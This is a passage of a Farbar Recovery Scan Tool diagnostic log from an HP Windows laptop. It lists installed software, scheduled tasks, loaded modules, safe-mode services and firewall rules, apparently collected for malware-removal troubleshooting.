HP 3D DriveGuard (HKLM-x32\...\{E8D0E2B8-B64B-44BC-8E01-00DDACBDF78A}) (Version: 6.0.28.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{0C723C74-62DF-4B35-9490-A207546D866D}) (Version: 2.21.4 - HP Inc.)
HP Documentation (HKLM\...\HP_Documentation) (Version: 1.0.0.1 - HP Inc.)
HP ePrint SW (HKLM-x32\...\{88970959-baf7-4864-a39a-69a58e8ae5cf}) (Version: 5.0.18701 - HP)
HP Photosmart 6520 series Basic Device Software (HKLM\...\{1151BCF8-3246-4E34-9C17-22E66318C41C}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Photosmart 6520 series Help (HKLM-x32\...\{D3293275-1002-41F5-BC37-099B4251FF5B}) (Version: 28.0.0 - Hewlett Packard)
HP Photosmart 6520 series Product Improvement Study (HKLM\...\{F144E07C-4019-4092-BE25-B57819C97D2F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8318.5320 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{78E2C850-ADA6-420D-BA35-2F4A9BE733CC}) (Version: 8.3.50.9 - HP)
HP Support Solutions Framework (HKLM-x32\...\{5F084DD8-AF2C-4004-9C92-820C32E4BD55}) (Version: 12.5.32.203 - HP)
HP Sure Connect (HKLM-x32\...\{6468C4A5-E47E-405F-B675-A70A70983EA6}) (Version: 1.0.0.27 - HP Inc.)
HP System Event Utility (HKLM-x32\...\{09D0DB68-90EA-4015-983E-A0BD777D5A02}) (Version: 1.4.10 - HP Inc.)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - HP Inc.)
HP Wireless Button Driver (HKLM-x32\...\{AF4C5F64-4E6A-438B-9832-8BDEE0E7B43D}) (Version: 1.1.17.1 - HP)
IGT Slots Fire Rubies (x32 Version: 3.0.2.59 - WildTangent) Hidden
Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
Intel® Chipset Device Software (x32 Version: 10.1.1.9 - Intel® Corporation) Hidden
Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10608.329 - Intel Corporation)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.2.1183 - Intel Corporation)
Intel® PRO/Wireless Driver (HKLM\...\{edcc2d98-dba0-4914-ba46-6dae7352cea9}) (Version: 19.20.0000.5007 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4454 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.8.0.1042 - Intel Corporation)
Intel® WiDi (HKLM\...\{6B15F1EF-F3A8-4C29-BF9E-18EB3683A83D}) (Version: 6.0.60.0 - Intel Corporation)
Intel® WiDi Software Asset Manager (x32 Version: 3.2.1184 - Intel Corporation) Hidden
Intel® Wireless Bluetooth® (HKLM-x32\...\{3920BCB0-23AA-4D0D-93E5-404692DAF9D2}) (Version: 19.00.1621.3340 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{d5572863-793c-4ec8-872a-43cccc68b948}) (Version: 18.40.0 - Intel Corporation)
Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
Little Boy: Walter's Scooter (x32 Version: 3.0.2.59 - WildTangent) Hidden
Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
Malwarebytes version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.7571.2109 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 51.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 en-US)) (Version: 51.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1 - Mozilla)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
Online Plug-in (x32 Version: 14.5.0.10018 - Citrix Systems, Inc.) Hidden
Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
PuppetShow: Return to Joyville (x32 Version: 3.0.2.126 - WildTangent) Hidden
Pyro Jump (x32 Version: 3.0.2.59 - WildTangent) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.21287 - Realtek Semiconduct Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.6.1001.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8004 - Realtek Semiconductor Corp.)
Regency Solitaire (x32 Version: 3.0.2.126 - WildTangent) Hidden
Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
Self-service Plug-in (x32 Version: 4.5.0.14155 - Citrix Systems, Inc.) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version: - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version: - Microsoft) Hidden
Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
Skype™ 7.31 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.31.104 - Skype Technologies S.A.)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.3.11.37 - Synaptics Incorporated)
Tasty Blue (x32 Version: 3.0.2.59 - WildTangent) Hidden
The Far Kingdoms (x32 Version: 1.1.2.4 - WildTangent) Hidden
TurboTax 2016 (HKLM-x32\...\TurboTax 2016) (Version: 2016.0 - Intuit, Inc)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
UserTesting (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\UserTestingPlugin) (Version: - UserTesting.com)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.1.0.28 - WildTangent)
WildTangent Games App for HP (x32 Version: 4.1.1.2 - WildTangent) Hidden
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {00DA6CEA-186D-4563-AC42-5D9024D5EE93} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
Task: {020EC6C1-8FC5-4E00-8AA3-DEEFEF76BC4F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe
Task: {02741E5B-6CB0-4785-8138-B76C8FFECD36} - System32\Tasks\AdobeAAMUpdater-1.0-LAPTOP-Q6I7UJ7H-Joseph => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {037E6CC1-F2A7-4570-94C3-34EFFF7FEF81} - System32\Tasks\HPCeeScheduleForJoseph => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-01-22] (Hewlett-Packard)
Task: {0D314300-9FF5-4A1E-8A6E-02DAC03B2F5A} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
Task: {28815AC6-2D9D-4DB2-9B9B-C15782F58F17} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
Task: {2B726BAB-E9B6-4B18-A788-E1550EBC27D3} - System32\Tasks\HPCustParticipation HP Photosmart 6520 series => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPCustPartic.exe [2012-10-17] (Hewlett-Packard Co.)
Task: {2CA50760-ECC6-4AE8-ABC0-7786D4ABD805} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2016-10-21] (Bitdefender)
Task: {31E6B1DE-6E6C-4EC4-BF0D-F5B3822B798F} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {334761BD-5E77-4258-B1B3-3EBE4E9225C0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
Task: {49F9DD57-0D8B-44AC-B3D2-0E9318CE1D6F} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
Task: {4A95B853-DC77-486C-853C-03F94CAE8DE7} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2015-06-05] (Intel Corporation)
Task: {56B055C5-6236-4075-A0A4-E2627BB3183B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
Task: {5C39963E-E07B-4DD3-BE48-6B43D7E7C731} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
Task: {5F53EEE8-4920-4181-806B-2DE65B82BAD7} - System32\Tasks\{832C82D8-6868-4CD7-AF1B-10388CE0E534} => Chrome.exe hxxp://ui.skype.com/ui/0/7.27.0.101/en/abandoninstall?source=lightinstaller&page=tsInstall
Task: {6EEBD8FF-375F-4F22-AA35-1697FE268304} - System32\Tasks\HP\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe [2016-01-21] (HP Development Company, L.P.)
Task: {794EC38E-0A13-4104-86A7-8F27C70DA1BB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
Task: {7A53628B-0D5A-4368-AD0B-4DF307943007} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
Task: {891256ED-2188-45B6-9656-46B60828F7EB} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Joseph\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {89D2A8B6-4765-4DCA-85AD-7596FECFB286} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
Task: {8EBEC732-67C6-4823-8F6D-D49219079BB5} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
Task: {963EEFD3-C066-4DFC-B419-A76DB6073FFB} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-01-03] (Bitdefender)
Task: {9F965779-1CB2-4D42-BC03-7B29DC26B7B7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_TH45U581RP => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
Task: {A6F5043F-81F4-4E57-B0B6-BF0997939F31} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
Task: {AE327D73-DB64-440F-9FF4-02DC16AA63C0} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
Task: {B25BDC00-270D-45CD-8FF5-1E12386E6D52} - System32\Tasks\HPDAS => C:\Program [Argument = Files\HP\HP ePrint\HP.DeliveryAndStatus.Desktop.App.exe /CheckJobs]
Task: {B787AC15-AED2-454D-A6A1-3EDF53CA38BA} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec-Logon => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
Task: {BB173364-607B-493A-935B-E5D7832968E5} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-28] (AVAST Software)
Task: {E5AF5C26-359C-43CC-BF3F-29807CD26CDD} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2016-04-04] ()
Task: {EF0F5F72-921B-416D-89FD-4102E543E277} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2016-12-15] (HP Inc.)
Task: {F3EA5147-1530-4527-9731-26F30F8AE0E1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {F4CC15E9-94C3-43C0-A478-E0AE034F0175} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-01-14] (Intel® Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\HP\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square
==================== Loaded Modules (Whitelisted) ==============
2017-02-01 08:44 - 2013-09-03 14:29 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
2017-02-01 08:44 - 2016-11-14 16:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpbr.mdl
2017-02-01 08:44 - 2016-11-14 16:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpdsp.mdl
2017-02-01 08:44 - 2016-11-14 16:52 - 03202816 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpph.mdl
2017-02-01 08:44 - 2016-11-14 16:52 - 01542976 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttprbl.mdl
2016-08-06 14:07 - 2014-04-14 20:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
2017-01-10 17:37 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-01-10 17:37 - 2017-01-20 07:47 - 02829776 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\arwlib.dll
2017-01-10 17:37 - 2017-01-20 07:47 - 02254800 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2016-07-16 06:42 - 2016-07-16 06:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-10-25 09:57 - 2016-10-25 09:57 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2016-04-01 13:57 - 2016-12-28 12:03 - 08924864 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2017-02-01 08:44 - 2017-01-13 13:51 - 00023328 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\en-us\bdsystray.txtui
2016-09-29 12:48 - 2016-09-29 12:48 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-01-10 22:47 - 2016-12-21 02:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-01-10 22:45 - 2016-12-21 01:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-01-10 22:45 - 2016-12-21 01:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-01-10 22:45 - 2016-12-21 01:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-01-10 22:45 - 2016-12-21 01:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-01-10 22:45 - 2016-12-21 01:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-01-10 22:46 - 2016-12-21 01:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-01-24 21:46 - 2017-01-24 21:46 - 03865600 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\Joseph\Downloads\AdwCleaner.exe:BDU [0]
AlternateDataStreams: C:\Users\Joseph\Downloads\Firefox Setup Stub 51.0.1.exe:BDU [0]
AlternateDataStreams: C:\Users\Joseph\Downloads\FRST64.exe:BDU [0]
AlternateDataStreams: C:\Users\Joseph\Downloads\JRT (1).exe:BDU [0]
AlternateDataStreams: C:\Users\Joseph\Downloads\JRT.exe:BDU [0]
AlternateDataStreams: C:\Users\Joseph\Downloads\mb3-setup-cb.NT-3.0.6.1469.exe:BDU [0]
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-10-30 02:24 - 2017-02-02 11:45 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Control Panel\Desktop\\Wallpaper -> C:\windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [{0308E923-8487-403F-B445-D15ED8CCCB95}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
FirewallRules: [{E42A29D0-C19D-4D1C-8FE2-D850981AEBA8}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
FirewallRules: [{29F940E0-B1B5-45D6-9E75-4BECF8FB67FC}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
FirewallRules: [{B3262CE0-7120-40CC-B8E9-77C75A53DBCA}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
FirewallRules: [{F580D45B-9B87-4478-9D02-4FB5710B4EE2}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
FirewallRules: [{6C97C639-83FE-4D5D-A976-D178E54ACEBA}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{D49EDF57-C52E-467F-A056-63D5BD0738D7}] => C:\Program Files\Intel Corporation\Intel WiDi\SmartAgentTest.exe
FirewallRules: [{261EA2B7-45BC-4067-83D5-2418ADCEE9C8}] => C:\Program Files\Intel Corporation\Intel WiDi\Next\WirelessDisplay.exe
FirewallRules: [{B59EE6A4-D725-4298-9685-DFD41B59B982}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiAppOld.exe
FirewallRules: [{CF4CA95C-09CF-4959-9D76-68426CDA477D}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
FirewallRules: [{080A3C37-1740-4E2C-815C-189C744E6E60}] => c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
FirewallRules: [{A9134569-28FB-4867-B6F4-AA1D2E5E15EE}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{0334F46F-ABB7-4487-AA0B-5C39528FE3FC}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{A0CD17AF-60E5-44AE-AC27-9328A673AC89}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{970594D0-4429-4C70-838A-D147ED3FC01F}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{DBA71186-0545-49C3-8B27-EF841C1940ED}] => C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{EA52B792-A898-4EF8-AD47-E12D2BF5BD0A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\DeviceSetup.exe
FirewallRules: [{A89935E6-6E46-4459-BA52-726242012FAF}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{2C60681B-0038-4452-ADDE-3FC15C74708A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{0790D2E9-EA09-4D41-BA01-B8BC78ECD5DA}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
